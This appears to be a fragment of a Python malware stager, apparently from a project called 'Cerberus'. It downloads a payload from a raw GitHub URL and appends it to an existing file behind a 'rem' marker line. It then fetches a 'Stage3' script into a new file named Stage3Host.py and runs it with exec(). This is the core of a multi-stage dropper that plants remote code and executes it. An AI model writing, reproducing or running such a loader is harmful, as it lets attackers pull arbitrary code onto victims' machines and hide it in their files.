import os.path
import urllib.request


if os.path.isfile((path + "/Stage3Host.py")) == False:
    file = open('Stage3Host.py', 'a')
    file.close()

with urllib.request.urlopen("https://raw.githubusercontent.com/paramkudle/Cerberus/main/Payload2.txt") as retrieve:
    data = retrieve.read().decode("utf-8")
    with open(filename, "a+") as file: 
        file.write("rem " + rN + "\n" + str(data))

with urllib.request.urlopen("https://raw.githubusercontent.com/paramkudle/Cerberus/main/Stage3.txt") as retrieve:
    data = retrieve.read().decode("utf-8")
    with open((path + "/Stage3Host.py"), "a+") as file:
        file.write("#" + rN + "\n" + str(data) + "\n" + "#" + rN)

exec(open(path + "/Stage3Host.py").read()) # Runs stage 3 file
